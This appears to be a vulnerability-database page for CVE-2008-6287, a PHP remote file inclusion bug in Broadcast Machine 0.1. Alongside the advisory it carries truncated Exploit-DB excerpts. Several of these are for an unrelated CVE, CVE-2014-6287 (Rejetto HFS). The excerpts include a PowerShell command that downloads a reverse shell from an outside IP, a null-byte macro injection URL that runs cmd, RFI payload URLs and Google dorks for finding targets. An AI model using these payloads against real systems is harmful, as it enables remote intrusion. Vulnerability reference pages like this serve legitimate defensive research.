CVE-2008-6287
published 2009-02-25CVE-2008-6287: Multiple PHP remote file inclusion vulnerabilities in Broadcast Machine 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the baseDir…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.31%
81.2th percentile
Multiple PHP remote file inclusion vulnerabilities in Broadcast Machine 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter to (1) MySQLController.php, (2) SQLController.php, (3) SetupController.php, (4) VideoController.php, and (5) ViewController.php in controllers/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getmiro | broadcast_machine | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
exploitdb·2020-11-30·CVSS 9.8
CVE-2014-6287 [CRITICAL] Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
---
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
#!/usr/bin/python3
# Usage : python3 Exploit.py
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
import urllib3
import sys
import urllib.parse
try:
http = urllib3.PoolManager()
url = f'http://{s
Exploit-DB
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
exploitdb·2016-01-04·CVSS 9.8
CVE-2014-6287 [CRITICAL] Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
---
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, ove
Exploit-DB
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
exploitdb·2014-09-15·CVSS 9.8
CVE-2014-6287 [CRITICAL] Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
---
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
it will not handle null byte so a request to
http://localhost:80/?search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injecti
Exploit-DB
Broadcast Machine 0.1 - Multiple Remote File Inclusions
exploitdb·2008-11-30
CVE-2008-6287 Broadcast Machine 0.1 - Multiple Remote File Inclusions
Broadcast Machine 0.1 - Multiple Remote File Inclusions
---
[o] Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability
Software : Broadcast Machine version 0.1
Vendor : http://code.google.com/p/broadcastmachine/
View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
[o] Vulnerable file
all file below is affected by "baseDir" parameter
controllers/MySQLController.php
controllers/SQLController.php
controllers/SetupController.php
controllers/VideoController.php
controllers/ViewController.php
[o] Exploit
http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode]
http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode]
h
No writeups or analysis indexed.
http://www.securityfocus.com/bid/32554http://www.vupen.com/english/advisories/2008/3289https://exchange.xforce.ibmcloud.com/vulnerabilities/46939https://www.exploit-db.com/exploits/7310http://www.securityfocus.com/bid/32554http://www.vupen.com/english/advisories/2008/3289https://exchange.xforce.ibmcloud.com/vulnerabilities/46939https://www.exploit-db.com/exploits/7310
2009-02-25
Published